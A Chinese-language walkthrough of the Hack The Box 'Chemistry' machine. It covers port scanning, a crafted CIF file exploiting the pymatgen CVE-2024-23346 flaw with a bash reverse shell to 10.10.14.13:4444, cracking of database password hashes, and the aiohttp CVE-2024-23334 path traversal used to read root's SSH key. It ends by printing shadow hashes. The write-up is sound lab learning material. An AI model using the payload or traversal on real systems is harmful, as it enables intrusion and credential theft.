基本信息

https://app.hackthebox.com/machines/Chemistry
10.10.11.38

端口扫描

22和5000:

$ nmap -sC -sV -Pn 10.10.11.38
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-21 14:11 CST
Nmap scan report for 10.10.11.38
Host is up (0.079s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
|_http-title: Chemistry - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds

5000

Chemistry CIF Analyzer:

Chemistry CIF Analyzer

注册登录使用example cif文件测试功能，就是解析cif文件：

CVE-2024-23346

搜索cif相关漏洞，发现这个：

Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string · Advisory · materialsproject/pymatgen
https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
CVE-2024-23346: Arbitrary Code Execution in Pymatgen via Insecure Deserialization
https://ethicalhacking.uk/cve-2024-23346-arbitrary-code-execution-in-pymatgen-via-insecure/#gsc.tab=0

打到app用户：

exp.cif

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.13/4444 0>&1'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

信息

App.py中得到数据库相关信息，查看数据库得到一些hash，可以破解出rosa的密码：

app = Flask(__name__)
app.config['SECRET_KEY'] = 'MyS3cretCh3mistry4PP'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
app.config['UPLOAD_FOLDER'] = 'uploads/'
app.config['ALLOWED_EXTENSIONS'] = {'cif'}

select * from user;

1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5

rosa 63ed86ee9f624c7b14f1d4f43dc251a5 unicorniosrosados

user flag

rosa用户ssh登录：

提权信息

基础枚举发现本地的8080端口，转发出来查看：

1	ssh rosa@10.10.11.38 -L 8085:127.0.0.1:8080

是一个站点监测：

aiohttp

页面功能没什么问题，注意到响应头中的aiohttp/3.9.1：

搜索可以发现：

z3rObyte/CVE-2024-23334-PoC: A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1
https://github.com/z3rObyte/CVE-2024-23334-PoC

根据poc，对应根据实际情况从static修改为assets：

简单的读取私钥：

root flag

使用得到的root私钥ssh登录：

shadow

1
2
3

root:$6$51.cQv3bNpiiUadY$0qMYr0nZDIHuPMZuR4e7Lirpje9PwW666fRaPKI8wTaTVBm5fgkaBEojzzjsF.jjH0K0JWi3/poCT6OfBkRpl.:19891:0:99999:7:::
rosa:$6$giyD4I2YumzG4k6.$0h0Gtrjj13qoK6m0XevedDBanbEz6BStzsLwUtrDm5sVkmnHOSSWF8f6W8B9btTEzyskmA2h/7F7gyvX1fzrT0:19893:0:99999:7:::
app:$6$XUL17hADm4qICsPv$QvCHMOImUTmS1jiaTQ2t6ZJtDAzgkqRhFYOMd0nty3lLwpyxTiyMWRgO/jbySPENinpJlL0z3MK1OVEaG44sQ1:19890:0:99999:7:::

参考资料

Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string · Advisory · materialsproject/pymatgen
https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
CVE-2024-23346: Arbitrary Code Execution in Pymatgen via Insecure Deserialization
https://ethicalhacking.uk/cve-2024-23346-arbitrary-code-execution-in-pymatgen-via-insecure/#gsc.tab=0
z3rObyte/CVE-2024-23334-PoC: A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1
https://github.com/z3rObyte/CVE-2024-23334-PoC

Chemistry - HackTheBox

2024-10-21